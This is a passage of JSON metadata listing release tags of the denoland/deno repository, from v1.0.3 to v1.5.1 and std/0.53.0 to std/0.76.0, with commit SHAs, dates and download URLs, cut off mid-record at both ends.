,"sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/d